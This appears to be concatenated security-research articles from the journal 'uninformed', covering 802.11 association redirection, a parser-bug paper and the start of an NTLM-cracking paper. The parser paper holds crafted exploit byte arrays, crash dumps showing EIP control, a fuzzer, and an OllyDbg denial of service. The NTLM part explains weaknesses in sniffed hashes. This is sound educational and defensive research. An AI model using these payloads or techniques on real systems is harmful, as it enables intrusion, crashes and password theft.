unique BSSID) for each virtual AP. The only thing shared between the individual
virtual APs is the hardware they are running on. The device goes so far as to
implement virtual Management Information Bases (MIBs) for each virtual AP. The
Colubris solution fits well into a heavily managed static environment where the
users and the groups they belong to are well defined. Deploying it requires
that each user knows which SSID to associate with a priori, along with any
required authentication credentials. The virtual access point is capable of
mapping virtual access points into 802.1q VLANs.
The public AP solution fits well into less managed networks. Public AP
utilizes the technique outlined in this paper. The Public AP broadcasts a
single beacon for a Public Access Point (PAP). When a client attempts to
associate, the PAP redirects him to a dynamically generated VBSSID, placing him
on his own PVLAN. This is well suited to a typical hotspot scenario where there
is no implicit trust between users, and the number of clients is not known
beforehand. This technique could also be used in conjunction with traditional
802.1q VLANs, however its strength lies in the lower burden of administrative
requirements. This technique is designed to work well when deployed in the
common hot spot scenario where the administrators have little other network
infrastructure and the only thing upstream is a best effort common carrier
provider.
4) PVLANs and virtual BSSIDs
PVLANs are called Personal Bridged VLANs because the VLAN is created
dynamically for the client. The client essentially owns the VLAN since he
controls its creation and its lifetime. In the most common scenario there
would only be a single client per PVLAN.
An access point that implements the PAP concept intentionally re-directs
associating clients to their own dynamically generated BSSID (Virtual BSSID or
VBSSID).
In the example below the AP is broadcasting a public BSSID of 00:11:22:33:44:55
and is redirecting the client to his own VBSSID 00:22:22:22:22:22.
5) The Experiment
The experiment conducted was not a full-blown implementation of a PAP. The
experiment was designed to test a wide variety of chipsets, cards, and drivers
for compatibility with the standard and susceptibility to association
re-direction. To this end all the cards were subjected to every reasonable
interpretation of the standard.
The experiment was conducted by making some simple changes to the host-ap
driver on Linux. Host-ap can operate in Access Point mode as well as in client
mode. All the modifications were made in Access Point mode. Host-ap's
client-side performance is unrelated to the changes made for the experiment.
The experiment was conducted in two phases. First, host-ap was modified to
mangle all management frames by modifying the source address, the BSSID,
or both at the same time. The results of this are reflected in table one.
After this was complete, host-ap was modified to return authentication replies
un-mangled. This was due to the number of cards that simply ignored mangled
authentication replies. These results are cataloged in table two.
5.1) The Results
The responses in table one varied all the way from never leaving stage 1 to
successful redirection. The most interesting cases are the drivers that
successfully made it to stage 3. There are three cases of this. The cases
marked ORIGINALBSSID are what was initially expected from many devices, that
they would simply ignore the redirect request and continue to transmit on the
PAP BSSID. The REDIRECTREASSOC case is a successful redirection with a small
twist. The card transmits all data to VBSSID, however it periodically sends
out reassociation requests to the PAP BSSID.
The SCHIZO case is the other case that made it into stage 3. In this case the
card is listening on the PAP BSSID and then proceeds to transmit on the VBSSID.
The device seems to ignore any data transmitted to it on the VBSSID.
As mentioned previously, for table two the possibility of ignoring
authentication replies was eliminated by not mangling any fields until the
association request. This opened up the possibility for some interesting
responses.
The Apple airport extreme card responded with a flood of deauthentication
packets to the null BSSID with a destination of the AP (DEAUTHFLOOD). The
Atheros card is the only other card that sent a deauth, though it had a much
more measured response, sending a single de-auth to the original BSSID
(SIMPLEDEAUTHSTA).
The other new response in table two is the DUALBSSID behavior. These cards
seem to alternate between both BSSIDs on every other transmitted packet.
It is unknown whether they continue to do this for the entire connection,
or whether this is some sort of intentional behavior and they will settle
on whichever BSSID they receive data on first.
The experiment provided some very surprising results. Originally it was
suspected that many cards would simply never enter stage 3, or alternately just
use the original BSSID they set out to. Quite a few cards can be convinced to
go into dual BSSID behavior and might be susceptible to association
redirection. Two drivers for the hermes chipset were successfully redirected.
6) Future Work
Clearly, modifying client-side drivers for better standards compliance is one
area where work could be done. More interesting questions remain: how does one handle key
management on the AP in this situation? Clearly any PSK solutions don't really
apply in this scenario. How much deviation from the spec needs to happen for
WPA 802.1x authentication to successfully be deployed? One interesting area of
research is the concept of a stealthy rogue AP.
By using association redirection clients could be the victim of stealthy (from
the perspective of the network admin) association hijacking from a rogue AP. An
adversary could just set up shop with a modified host-ap driver on a Linux box
that didn't transmit beacons. Rather, it would wait for a client to attempt an
association request with the legitimate access point and try to win a race
condition to see who could send an association reply first. Alternately the
adversary could simply de-authenticate the user and then be poised to win the
race.
Another interesting question is whether or not a PAP could withstand a DoS
attack attempting to create an overwhelming number of VBSSIDs. It is the
author's opinion that a suitable algorithm could be found to make the resources
required for the attack too costly for most. By dynamically expiring PVLANs and
VBSSIDs as a function of time and traffic the PAP could burden the attacker
with keeping track of all his VBSSIDs as well, instead of just creating as many
as he can and forgetting about them.
7) Conclusion
It is unlikely that this technique could successfully be deployed to create
PVLANs in a general scenario due to varied behavior from the vendors.
However, it does appear that a determined attacker could encode the data
generated from this experiment into a modified host-ap driver so that he could
stealthily redirect traffic to himself. This would give the attacker a slight
advantage over typical ARP poisoning attacks since he doesn't need to generate
any suspicious ARP activity. It also has an advantage over simple rogue access
points, as it requires no beacons, which can easily be detected.
8) Bibliography
Volpano, Dennis. United States Patent Application 20040141617. July 22, 2003
http://appft1.uspto.gov/netahtml/PTO/search-adv.html
Institute of Electrical and Electronics Engineers.
Information technology - Telecommunications and information
exchange between systems - Local and metropolitan area networks - Specific
Requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical
Layer (PHY) Specifications, IEEE Std. 802.11-1999, 1999. (pg 376)
Aboba, Bernard.
Virtual Access Points (IEEE document IEEE 802.11-03/154r1) May 22, 2003
http://www.drizzle.com/~aboba/IEEE/11-03-154r1-I-Virtual-Access-Points.doc
Colubris Networks. Virtual Access Point Technology Multiple WLAN Services
http://www.colubris.com/literature/whitepapers.asp
accessed Aug 09, 2005.
--[ uninformed/2.txt ]--
Engineering in Reverse
Inside Blizzard: Battle.net
Skywing
This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat service, Battle.net. The paper provides some background historical information into the design and purpose of Battle.net and continues on to discuss a variety of flaws that have been observed in the implementation of the system. Readers should come away with a better understanding of problems that can be easily introduced in designing a matchmaking/chat system to operate on such a large scale in addition to some of the serious security-related consequences of not performing proper parameter validation of untrusted clients.
html | pdf | txt
Exploitation Technology
Temporal Return Addresses
skape
Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit authors generally make use of static addresses that may or may not be portable between various operating system and application revisions. This fact can make exploits unreliable depending on how well researched the static addresses were at the time that the exploit was implemented. In some cases, though, it may be possible to predict and make use of certain addresses in memory that do not have static contents. This document introduces the concept of temporal addresses and describes how they can be used, under certain circumstances, to make exploitation more reliable.
html | pdf | txt | code.tgz
Bypassing Windows Hardware-enforced DEP
skape & Skywing
This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute code from regions that are typically non-executable when hardware support is present, such as thread stacks and process heaps. While other techniques have been used to accomplish similar feats, such as returning into NtProtectVirtualMemory, this approach requires no direct reprotecting of memory regions, no copying of arbitrary code to other locations, and does not have issues with NULL bytes. The result is a feasible approach that can be used to easily bypass the enhancements offered by hardware-enforced DEP on Windows in a way that requires very minimal modifications to existing exploits.
html | pdf | txt
General Research
802.11 VLANs and Association Redirection
Johnny Cache
The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. What makes this technique interesting is that it can be accomplished without breaking the IEEE 802.11 standard on the client side, and requires only minor changes made to the Access Point (AP). No modifications are made to the 802.11 MAC. It is the author's hope that after reading the paper the reader will not only understand the specific technique outlined below, but will consider protocol specifications with a new perspective in the future.
html | pdf | txt
--[ uninformed/3.1.txt ]-- (contents omitted: file too large)

--[ uninformed/3.2.txt ]-- (contents omitted: file too large)

--[ uninformed/3.3.txt ]--
Analyzing Common Binary Parser Mistakes
Orlando Padilla
xbud@g0thead.com
Last modified: 12/05/2005
Abstract: With just about one file format bug being
consistently released on a weekly basis over the past six to twelve
months, one can only hope developers would look and learn. The
reality of it all is unfortunate; no one cares enough. These bugs
have been around for some time now, but have only recently gained
media attention due to the large number of vulnerabilities being
released. Researchers have been finding more elaborate and passive
attack vectors for these bugs, some of which can even be leveraged
into a remote compromise.
No new attacks will be presented in this document; instead, examples and
a sample file format will be used to demonstrate an insecure
implementation of a parsing library. As a bonus for reading this
article, an undisclosed bug in a popular debugger will be released
during the case study material of this paper. This vulnerability,
if leveraged properly, will cause the debugger to crash during the
loading of a binary executable or dynamic library.
Disclaimer: This document is written with an educational
interest and I cannot be held liable for any outcome of the
information being released.
Thanks: #vax, nologin, and jimmy haffa
= Introduction
A number of papers have already been written describing the
exploitation of integer overflows, however, very few publications
have been aimed at the exploitation of integer overflows within
binary parsers. The current slew of advisories released by iDefense
(Clam AV, Adobe Acrobat), eEye (Macro Media, Windows Metafile) and
Alex Wheeler via Rem0te.com (Multiple AV Vendors) on file format
bugs should be enough to take these bugs seriously.
The most common mistake applied by a programmer is in trusting a
field inside a binary structure that should not be trusted. During
the design phase: efficiency, simplicity and the secure
implementation of a particular project should be at the top of the
priority list. When dealing with data that cannot be presented only
as strings, a length field is required to tell the application when
to stop reading. When dealing with sections that must have
subsections, knowing ahead of time how many sections are embedded
within the primary section of a structure is required and again, a
value must be used to instruct the application only to iterate
x number of times. In the following paragraphs, the
description of a binary file structure will be presented, followed
by applied examples of typical coding errors encountered when
auditing applications. An overview of integer overflows will be
discussed for the sake of completeness. Finally, a case study of
several bugs found during the research of a particular file format
will be shown.
= Certificate Storage File
The following file format was designed and written specifically for
this article and has no real world applicable use. The general idea
behind the implementation of this file format is to create a single
binary file acting as a searchable database for certificate files.
The file will consist of two core structures, which will hold the
information necessary to parse the certificates in DER format. This
is a rough diagram of what the file looks like after compilation:
+----------------------+-----------+---------+
| Structure | Offset | Size |
+----------------------+-----------+---------+
| OP Header | 0 | 4 |
| Element Count | 4 | 2 |
| Cert File Fmt Struct | 6 | 6 |
| Cert Data Struct | 12 | 16 |
| Cert 1 | | |
| Cert 2 | | |
| Cert | | |
| Cert n | | |
+----------------------+-----------+---------+
= Binary Layout
The following structures are defined in the file format's compiler library.
typedef struct _CERTFF
{
unsigned int NumberOfCerts;
unsigned short PointerToCerts;
}CERTFF,*PCERTFF;
typedef struct _CERTDATA
{
char Name[8];
unsigned short CertificateLen;
unsigned short PointerToDERs;
unsigned char *DataPtr;
}CERTDATA,*PCERTDATA;
The first data structure consists of an unsigned int, NumberOfCerts, and
an unsigned short, PointerToCerts. These hold the total number of
certificates stored in this binary (NumberOfCerts) and the offset from
the beginning of the file to the first certificate data structure,
CERTDATA (PointerToCerts). We can already assume that a
parser will iterate through the image file NumberOfCerts times,
starting from PointerToCerts in chunks of the size of CERTDATA at a
time. The second data structure consists of a character array 8
bytes in size, which is used to hold the first 7 characters of a
certificate's description, followed by two unsigned short integers
which hold the length of the certificate referred to by this
structure, and the offset to the beginning of the certificate
respectively. The last element is an unsigned char, which is used
to carry the body of the certificate by the compiler.
= Applied Examples
As the number of buffer overflows decreases, the number of integer
overflows and improper file and binary protocol parsing bugs
increases. The following URL query to OSVDB (the Open Source
Vulnerability Database) for integer overflows is a perfect example
of the diversity of applications affected. The list is rather short
considering the number of vulnerabilities actually released in the
past two to three years. Still, it accurately displays different
levels of severity: kernel, library, protocol and file format bugs.
http://osvdb.org/searchdb.php?action=search_title&vuln_title=integer+overflow&Search=Search
As a proof of concept, I developed a parsing library for the
construct above. See Appendix A for code. The code functionality
is simple. As explained above it consolidates certificates (in this
example) into a single file. There are several bugs in the library
that I mocked from actual implementations of different open source
and closed source applications. The first vulnerability exists in
the single cert extraction tool 'certextract.c'. The issue is
pretty obvious; the library trusts that the file being parsed has
not been tampered with. The following code snippet highlights the
issue:
unsigned char cert_out[MAX_CERT_SIZE];
16 unsigned char *extract_cert = "req1.DER";
...
64 pCertData = (PCERTDATA)(image + get_cert(image,extract_cert));
65
66 memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen);
...
The vulnerability exists because the library assumes the certificates
will not be larger than MAX_CERT_SIZE due to the compiler's
inability to take files larger than the set size. All an attacker has
to do is modify the file using an external editor or reverse engineering
the file format and creating a malicious certificate db. A step-by-step
example on exploitation of this bug is out of the scope of this
document, but let's look at what has to be done to prepare an exploit
for this vulnerability.
We already know we have to modify the length field to something
larger than MAX_CERT_SIZE or if we look specifically at
'certlib.h', larger than 2048 bytes. Looking at the structure of
the headers, we can see that each certificate has its own length
field. So creating a valid structure header and placing it at a
correct offset along with a corresponding payload should do the
trick. With this in mind, calculate the number of bytes from the
beginning of the file to the first certificate.
[SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct]
It seems we can drop our fake structure after the 12th byte. The
cert structure will look something like the following (depending on
the size of the payload you are using):
unsigned char exploit_dat1[] = {
/* Name of our fake cert */
0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
/* our, length */
0x53, 0x08,
/* where we can write our data, PointerToDer*/
0x18, 0x00,
/* DataPtr just for completion */
0x00, 0x00, 0x00, 0x00
};
Notice the length is an unsigned short integer that limits our payload
to 0xFFFF (65535), which should be more than enough space. The
two most important sections of our structure are the length, and the value
we give PointerToDer since this will point to the beginning of our
payload. Since we are choosing to make our fake certificate the first
one on the list, anything below it can be overwritten with little
concern. At offset 0x18 of the dat file we have 0x0853
bytes of A's; notice there is no bounds check on this value. Below is a
sample run of a valid certsdb.dat file and a second sample run with our
malicious dat file.
(xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER
cert req1.DE
len: 657 PtrToData: 90
(xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER
e3e45e30b18a6fc9f6134f0297485cc1 req1.DER
e3e45e30b18a6fc9f6134f0297485cc1 out.DER
(gdb) r ./badcertdb.dat out.DER
Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER
cert req1.DE
len: 2131 PtrToData: 27
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
The actual exploitation of this vulnerability is left as an exercise
for the reader; given the file structure necessary to build the attack,
it is now trivial to complete.
= Continuing Applied Examples
The utility 'certdb2der.c' provided in this example suite iterates
through the dat file and dumps the contents of each certificate into
individual files. The CERTFF (Certificate File Format) structure
contains an element called NumberOfCerts of type unsigned int. This
integer explicitly controls the loop iterator, controlling the number
of CERTDATA structures said to be in the body of the dat file.
59 pCertFF = (PCERTFF)(image + OFFSET_TO_CERT_COUNT);
60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA);
61
62 pCertData = (PCERTDATA)malloc(alloc_size);
63
64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1);
An integer overflow condition may be triggered during memory allocation
for the 'pCertData' array of structures. If a specially crafted dat
file contains a high enough NumberOfCerts value, the allocation size
computed by the multiplication on line 60,
(pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA), becomes improper.
The maximum value for an unsigned integer is 4294967295, or 0xffffffff,
so when the value in NumberOfCerts is multiplied by sizeof(CERTDATA),
or 16 bytes, an overflow occurs, causing the value to wrap and
resulting in an invocation of malloc() with a wrapped (effectively
negative) value, or even a malloc(0).
This could then be leveraged into executing arbitrary code on certain
malloc implementations by overwriting control structures in the heap.
Again, exploitation is not covered in detail, but pre-exploitation is
explained below. Please refer to the references section for papers
covering heap overflow exploitation.
Constructing a fake valid CERTFF chunk and properly placing it in a dat
file is most of the work when preparing a file format exploit. The
first 6 bytes of our file will remain the same, so we can assume our
exploit will look something like the following:
[ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...]
[SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ]
unsigned char exploit_dat1[] = {
/* header info */
0x4f, 0x50, 0x00, 0x00, 0x01, 0x00,
/* our length followed by our certs pointer */
0xff, 0xff, 0xff, 0xff,
0x0a, 0x00,
/* One valid cert */
0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
/* our length */
0x00, 0x07,
/* where we can write our data to PointerToDer*/
0x00, 0x26,
/* DataPtr useless to us */
0x00, 0x00, 0x00, 0x00,
};
unsigned char exploit_dat2[] = {
/* fake certs for fill */
0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00,
/* our length */
0x00, 0x10,
/* where we can write our data to PointerToDer*/
0x26, 0x04,
/* DataPtr useless to us */
0x00, 0x00, 0x00, 0x00,
};
The pseudo code below denotes the structure of the rest of the binary
dat file.
for(i = sizeof(exploit_dat1); i < buf.length; i+= sizeof(exploit_dat2))
memcopy(buf + i,exploit_dat2, sizeof(exploit_dat2));
In short, the code copies the contents of our second structure
repeatedly, from the 24th byte until the end of the buffer is
reached. The following displays a run of the utility used correctly,
followed by an iteration through the malicious certificates db file.
(xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat
req1.DE of length: 657 is being written to disk...
req2.DE of length: 649 is being written to disk...
req3.DE of length: 653 is being written to disk...
req4.DE of length: 651 is being written to disk...
req5.DE of length: 652 is being written to disk...
(xbud@yakuza <~/code/random>) $
(gdb) r 2badcertdb.dat
Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat
Program received signal SIGSEGV, Segmentation fault.
0xb7e1267f in memcpy () from /lib/tls/libc.so.6
(gdb) x/i $pc
0xb7e1267f <memcpy+47>: repz movsl %ds:(%esi),%es:(%edi)
(gdb)i reg
eax 0xffffffff -1
ecx 0x3fff9c02 1073716226
edx 0x804a008 134520840
...
Reconstructing our memcpy(buf, edx (our fake certs), eax (-1)): the
value stored in eax is -1, which is converted to unsigned inside
memcpy, so 4GB of data are copied into our destination buffer of only
0x800 bytes in size.
= Case Study
= The Microsoft PE/COFF Headers
There are a number of documents and tools out there that explain the
structure of Microsoft's infamous PE (Portable Executable) and old
Unix-style COFF (Common Object File Format) headers. As such, I will
refrain from elaborating on what each element inside each structure
does. Instead, I will focus on the critical sections that may allow
an attacker to alter the contents of header elements specifically to
break implementations of PE/COFF parsers.
With that in mind we can now begin our journey into the world of PE.
At file offset 0x3C, as specified in MS's pecoff.doc, there is a
four-byte file offset pointing to the PE signature; immediately after
the signature, there is a standard COFF header of the following format:
IMAGE_FILE_HEADER //(Coff)
{
unsigned short Machine;
unsigned short NumberOfSections;
unsigned int TimeDateStamp;
unsigned int PointerToSymbolTable;
unsigned int NumberOfSymbols;
unsigned short SizeOfOptionalHeader;
unsigned short Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
Does anything look similar to our hypothetical file format used in
the examples above?
NumberOfSections and NumberOfSymbols are both synonymous with
NumberOfCerts with respect to their own file format. These
elements, along with SizeOfOptionalHeader make for interesting
attack vectors. Before strolling further along into the COFF Header
specifics, it is important to pay a bit more attention to the offset
0x3C being referred to in the PECOFF.doc document. It
states that the file offset specified at offset 0x3C in
the image file points to the PE signature.
What would happen if this file offset was bogus? What if the offset
at offset 0x3C points to fstat(image).st_size + 1 ?
We cause the parser to access illegal memory. This bug was present in
the majority of the PE viewers tested. Although the significance of this
bug is minimal, since the modified binary will no longer execute, picture
a scenario where an attacker simply needs to crash an application that
happens to preprocess a PE header. All an attacker must do to trigger
this bug is build a fake MZ header also known as a Dos Stub header and
invalidate the 0x3C offset. The MS-DOS Stub is a
valid application that runs under MS-DOS and is placed at the front of the
.EXE image. The linker places a default stub here, which prints out the
message "This program cannot be run in DOS mode" when the image is run in
MS-DOS.
The second element, NumberOfSections, indicates the number of
Section Headers this file has mapped. Once again, fuzzing this
element with random numbers yields interesting results in tools
like MSVC's dumpbin.exe, PEView, PE Explorer, msfpescan, etc.
Continuing our dive into PE madness: following the COFF header there
is an OPTIONAL_HEADER, also referred to as the PE header, which
consists of the following elements:
_IMAGE_OPTIONAL_HEADER32 {
unsigned short Magic;
...
unsigned int ImageBase;
...
unsigned short MajorOperatingSystemVersion;
unsigned short MinorOperatingSystemVersion;
...
unsigned int SizeOfImage;
unsigned int SizeOfHeaders;
...
unsigned int LoaderFlags;
unsigned int NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
There were a number of elements omitted here for the sake of brevity,
most of which aid the loader in identifying the type of file and its
core mappings. Please refer to the appendix for more information on
what each specific element means. Again, several elements in this
structure look interesting enough to play with, however we will only be
looking at the IMAGE_DATA_DIRECTORY array of entries. In
particular, the first index of that directory contains a pointer to the
EXPORT/IMPORT_DIRECTORY_TABLE structures. The element
NumberOfRvaAndSizes in the structure above refers to the number of
elements in the DataDirectory array. The following is the last
structure fuzzed for this case study.
_EXPORT_DIRECTORY_TABLE {
unsigned long Characteristics;
unsigned long TimeDateStamp;
unsigned short MajorVersion;
unsigned short MinorVersion;
unsigned long NameRVA;
unsigned long OrdinalBase;
unsigned long NumberOfFunctions;
unsigned long NumberOfNames;
unsigned long ExportAddressTableRVA;
unsigned long ExportNameTableRVA;
unsigned long ExportOrdinalTableRVA;
} EXPORT_DIRECTORY_TABLE, *PEXPORT_DIRECTORY_TABLE;
The Export Directory Table contains address information that is
used to resolve fix-up references to the entry points within this image.
The elements NumberOfFunctions and NumberOfNames indicate the obvious,
and again, if something trusts the numbers in this structure without
error checking, unexpected results can occur.
= Introducing breakdance.c
Although file fuzzing is relatively simple, tools help reduce the amount
of time it takes to reconstruct a format and reach deep into a
section buried within several structures. I typically use
xxd -i, hd (hexdump), or shred (a hex editor) for Windows
to reconstruct a binary image and fuzz the structures
manually, but I decided to develop a tool to do the work for me in the
case of PE. The following options are available:
Usage: ./breakdance [parameters]
Options:
-v verbose
-o [file] File to write to (defaults) out.ext
-f [file] File to read from
-e [value] Modify Export Directory Table's number
of functions and number of names
-p Print sections of a PE file and exit
-c Create new section (.pepe) not to be used with -m
-s [section] Section to overwrite (can be used with -c)
-m [section] [value]
-n [length] Fuzz Export Directory Table's Strings
Modify [section] with [int] where:
section is one of [image_start] [number_of_sections]
ex. ./breakdance -v -o out -f pebin -m "image_start" 65536
ex. ./breakdance -v -o out -f pebin -c -s .rdata
[Warning if -o option isn't provided with mod options, changes are discarded]
The following is a list of binary parsers affected by the fuzzing options
provided by breakdance.c. The list is by no means comprehensive in
terms of PE parsers, but it is all I tested against. The fuzzing
capabilities are rather minimal considering the number of structures and
elements in the PE/COFF specification; however, it is enough to
demonstrate how broken binary parsers can be.
+--------------+-----------------+-------------------+
| Tool Name | Vendor | Section |
+--------------+-----------------+-------------------+
| PE View | Wayne Radburn | All |
| MSVS bindump | Microsoft | All |
| OllyDbg | Oleh Yuschuk | NumberOfFunctions |
| PE Explorer  | Heaventools.com | NumberOfSections  |
+--------------+-----------------+-------------------+
= Affected Toolsets
Although I can almost guarantee other parsers are just as buggy,
this selection is pretty well known and should suffice as a
demonstration. The only issue I will elaborate on is the OllyDbg
denial of service attack. This issue is interesting due to the fact
that even after modifying the PE image to DoS OllyDbg, the binary
itself is still executable. This can be leveraged as an attack
vector against reverse engineers who rely on OllyDbg to reverse
binaries. The following is a run of breakdance against a DLL.
(xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \
/home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll
...
NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647
Dumping 348160 bytes
(xbud@yakuza <~/code/random>) $
-- Inside WinDbg --
This exception may be expected and handled.
eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000
eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
*** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\tools\odbg110\OLLYDBG.EXE -
OLLYDBG!Createlistwindow+0x1bb4:
0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=????
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4
00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b
= Conclusions
The general rule of thumb here is not to trust any user-modifiable
data. The trust between an application and input components such as
sockets, file I/O, named pipes, etc. should always be minimal and, at
an extreme, such input should be considered dangerous. The fact that a
file format specification exists is not an excuse to assume all data
gathered from an alleged file is valid. Validate your input against
a working ruleset, and if the assertion fails, raise an exception.
Keeping your code simple means accepting only valid input and denying
all variants.
All the code referenced is provided in the attached tar ball; a
safer version of the library for parsing the hypothetical file
format developed for this paper is included for demonstration
purposes.
uninformed/3.4.txt
Attacking NTLM with Precomputed Hashtables
warlord
warlord@nologin.org
1) Introduction
Breaking encrypted passwords has been of interest to hackers for a long
time, and protecting them has always been one of the biggest security
problems operating systems have faced, with Microsoft's Windows being no
exception. Due to errors in the design of the password encryption
scheme, especially in the LanMan (LM) scheme, Windows has a bad track
record in this field of information security. In the last couple of
years especially, the outdated DES encryption algorithm that LanMan is
based on has faced ever more processing power in the average household,
which, combined with ever-increasing harddisk sizes, has made it crystal
clear that LanMan nowadays is not just outdated, but antiquated.
Until now, breaking a LanMan hashed password required somehow accessing
the machine first of all and grabbing the password file. That didn't
render remote password breaking impossible, but since a remote attacker
had to break into the system first to get the required data, it didn't
matter much. This paper will try to change this point of view.
2) The design of LM and NTLM
2.1) The LanMan disaster
By default Windows stores all users' passwords with two different
hashing algorithms: the historically weak LanMan hash and the more
robust MD4. The LanMan hash is based on DES and has been described in
Mudge's rant on the topic. A brief recap of the LM hash is below,
though those unfamiliar with LM will probably want to read that rant
first.
First of all, Windows takes a password and makes sure it's 14 bytes
long. If it's shorter than 14 bytes, the password is padded with null
bytes. Brute forcing up to 14 characters can take a very long time, but
two factors make this task much easier. First, not only is the set of
possible characters rather small, Microsoft further reduces it by making
sure a password is stored all uppercase. That means "test" is the same
as "Test" is the same as "tesT" is the same as...well...you get the
idea. Second, the password is not really 14 bytes in size. Windows
splits it up into two times 7 bytes. So instead of having to brute force
up to 14 bytes, an attacker only has to break 7 bytes, twice. The
difference is (keyspace^14) versus (keyspace^7)*2. That's a huge
difference.
Concerning the keyspace, this paper focuses on the alphanumerical set of
characters only, but the entire possible set of valid characters is:
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !@#$%^&*()_-=+`~[]{}|\:;"'<>,.?/
The next problem with LM stems from the total lack of salting or cipher
block chaining in the hashing process. To hash a password the first 7
bytes of it are transformed into an 8 byte odd parity DES key. This key
is used to encrypt the 8 byte string "KGS!@#$%". The same thing happens
with the second part of the password.
This lack of salting creates two interesting consequences. Obviously
this means the password is always stored in the same way, and just begs
for a typical lookup table attack. The other consequence is that it is
easy to tell if a password is bigger than 7 bytes in size. If not, the
last 7 bytes will all be null and will result in a constant DES hash of
0xAAD3B435B51404EE.
As I already pointed out, LM has been extensively documented.
"L0phtcrack" and "John the Ripper" are both able brute force tools to
break these hashes, and Philippe Oechslin of the ETH Zuerich was the
first to precompute LM lookup tables that allow breaking these hashes in
seconds.
2.2) NTLM
Microsoft attempted to address the shortcomings of LM with NTLM. Windows
NT introduced the NTLM (NT LanManager) authentication method to provide
stronger authentication. The NTLM protocol was originally released in
version 1.0 (NTLM), and was changed and fortified in NT SP6 as NTLMv2.
When exchanging files between hosts in a local area network, printing
documents on a networked printer or sending commands to a remote system,
Windows uses a protocol called CIFS - the Common Internet File System.
CIFS uses NTLM for authentication.
In NTLM, the protocol covered in this document, the authentication works
in the following manner. When the client connects to the server and
requests a new session, the server replies with a positive session
response. Next, the client sends a request to negotiate a protocol for
one of the many dialects of the SMB/CIFS family by providing a list of
dialects that it understands. The server picks the best out of those and
sends the client a response that names the protocol to use, and includes
a randomly generated 8 byte challenge.
In order to log in now, the client sends the username in plaintext(!),
and also the password, hashed NTLM style. The NTLM hash is generated in
the following manner:
[UsersPassword]->[LMHASH]->[NTLM Hash]
The NTLM hash is produced by the following algorithm. The client takes
the 16 byte LM hash, and appends 5 null bytes, so that the result is a
string of 21 bytes length. Then it splits those 21 bytes into 3 groups
of 7 bytes. Each 7 byte string is turned into an 8 byte odd parity DES
key once again. Now the first key is used to encrypt the challenge with
the DES algorithm, producing an 8 byte hash. The same is done with keys
2 and 3, so that there are two additional 8 byte hashes. These 3 hashes
are simply concatenated, resulting in a single 24 byte hash, which is
the one being sent by the client as the encrypted password.
Mudge already pointed out why this is really stupid, and I'll just
recapitulate his reasons here. An attacker capable of sniffing traffic
can see the username, the challenge and the 24 byte hash.
First of all, as stated earlier, if the password is less than 8 bytes,
the second half of the LM hash always is 0xAAD3B435B51404EE. For the
purpose of illustration, let's assume the first part of the hash is
0x1122AABBCCDDEEFF. So the entire LM hash looks like:
-------------------------------------------
| 0x1122AABBCCDDEEFF | 0xAAD3B435B51404EE |
-------------------------------------------
When transforming this into an NTLM hash, the first 8 bytes of the new
hash are based solely on the first 7(!) bytes of the LM hash. The second
8 byte chunk of the NTLM hash is based on the last byte of the first LM
hash, and first 6 bytes of the second LM hash. Now there are 2 bytes of
the second LM hash left. Those two, padded with 5 null bytes and used to
encrypt the challenge, form the third 8 byte chunk of the NTLM hash.
That means in the example this padded LM hash
------------------------------------------------------
| 0x1122AABBCCDDEE | FFAAD3B435B514 | 04EE0000000000 |
------------------------------------------------------
is being turned into the 24 byte NTLM hash. If the password is smaller
than 8 characters in size, the third part, before being hashed with the
challenge to form the NTLM hash, will always look like this. So in order
to test whether the password is smaller than 8 bytes, it's enough to take
this value, the 0x04EE0000000000, and use it to encrypt the challenge
that got sniffed from the wire. If the result equals the third part of
the NTLM hash which the client sent to the server, it's a pretty safe
bet to say the password is no longer than 7 chars. It's even possible to
make sure it is. Assuming from the previous result that the second LM
hash looks like 0xAAD3B435B51404EE, the second chunk of the 24 byte NTLM
